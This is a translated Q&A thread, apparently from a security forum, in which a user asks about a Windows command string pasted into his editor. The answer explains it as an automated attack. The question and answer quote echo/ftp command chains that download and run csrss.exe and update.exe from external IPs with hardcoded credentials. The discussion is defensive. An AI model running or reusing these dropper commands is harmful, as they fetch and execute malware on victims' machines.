Necesito ayuda para averiguar el significado de un posible script de secuestro

Navega tus respuestas
1

Estoy usando Ubuntu 13.04. Algo realmente extraño sucedió. Estaba escribiendo mi tarea para un curso de Ruby. Tuve Sublime Text 2 (un editor de texto como Notepad, Notepad ++, Textmate, etc.) abierto y estaba trabajando en algún código. También estaba navegando en la web usando la última versión de Chrome. En algún momento cambié de ventana de Chrome a Sublime Text 2. Estaba a punto de escribir algo, cuando de repente se "pegó" el siguiente script en mi documento: 

eq&echo user 20858 17334 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq

Se pegó en varias porciones en sucesiones muy rápidas. Era como si alguien tuviera control sobre mi computadora y estuviera pegando esto. Estoy seguro de que no lo pegué yo mismo (en caso de que alguien piense que de alguna manera se haya copiado en mi portapapeles para pegarlo la próxima vez que presione Ctrl + V). Así que mi (s) pregunta (s): ¿Qué significa este script, qué tipo de ataque fue ese y cómo me protejo de esto en el futuro?

    
pregunta Alex Popov 30.10.2013 - 22:01
fuente

1 respuesta

2

Bueno, parece haber algunos fragmentos de código similares en la web. El más similar al suyo se encontró en un sitio de tipo Pastebin que se ha eliminado desde entonces (pero el Google Cache fue aún hasta):

  

cmd / c echo abierto 201.120.57.137 21 > > ik & echo usuario oracle oracle > >   ik & echo binary > > ik & echo obtenga update.exe > > ik & echo bye > > ik & ftp   -n -v -s: ik & del ik & update.exe & exit & echo abierto 95.125.139.200 11104 > > eq & echo user 1297 20204 > > eq & echo obtenga csrss.exe > > eq & echo quit > > eq & ftp -n -s: eq & csrss.exe & del eq

Aunque el código es algo diferente, hay un bastante buen análisis del veterano miembro del foro Ars Technica Syonyk aquí:

  

tl; versión de dr: "No ejecute VNC en una IP pública con nada más que una muy,   contraseña muy fuerte Mejor aún, no lo ejecute en un puerto público (enlace   a localhost), y SSH / VPN para acceder. "

     

Una amiga mía tiene una Mac, y su sistema ha sido un poco extraño   últimamente.

     

Específicamente, ha estado actuando de manera sospechosa como si estuviera enraizado -   que, al ser un compañero usuario de Mac, me preocupa mucho. Ella ha tenido al azar   el texto aparece en las ventanas de mensajería instantánea, pero aparentemente estaba lejos de la computadora   y nunca investigado.

     

Esta noche, había algo que apareció en una ventana de la terminal mientras estaba   Lejos, y me lo envié. Tengo acceso remoto (root) a su sistema   (Ella es consciente de esto y creó la cuenta para mí), y estaba aburrida, así que   Decidí investigar. ... Mi primer pensamiento fue que esto tenía que ser.   Un programa automatizado. Un humano no intentará entrar en Win32 específico   comandos en una Mac. Parece que el programa envió códigos clave que fueron   no traducido correctamente a la Mac, lo que sería coherente con un   programa automatizado.

En general, pensaría que:

  • Este es un ataque automatizado. csrss.exe es un sistema de Windows ejecutable, y alguien específicamente dirigido a su sistema Linux no intentaría invocarlo.

  • Este tipo de ataque (pasando una secuencia de comandos al usuario portapapeles con la esperanza de que se ejecutará inadvertidamente en un el símbolo del sistema) no es nuevo: la publicación de Ars Technica es de 2002, sobre Hace una década.

Por lo tanto, sugiero que su computadora no se vea comprometida (contrariamente a la opinión de Ars Technica anterior):

  1. Pareces no haber cometido los errores descritos. Puede ser "solo" que un La característica del navegador (o exploit) ha permitido que un sitio malicioso acceda a tu portapapeles.

  2. Si efectivamente su computadora ha sido comprometida, el atacante lo haría no tiene necesidad de usar este método, él solo interactuaría con un shell remotamente.

La solución para usted probablemente sería la espera vigilante, como si estuviéramos alertas ante cualquier otra rareza, y si se la vuelve a evaluar.

O si alguna acción fuera considerada prudente, probablemente lo mejor serían los sospechosos habituales: asegúrese de que su navegador (s), los complementos del navegador y su sistema operativo estén actualizados con los parches de seguridad.

    
respondido por el scuzzy-delta 30.10.2013 - 22:22
fuente

Lea otras preguntas en las etiquetas

Alcance de los controles de antivirus v2 PCI v2 ¿Cuáles son las implementaciones básicas que hacen que una red sea segura desde adentro \ afuera?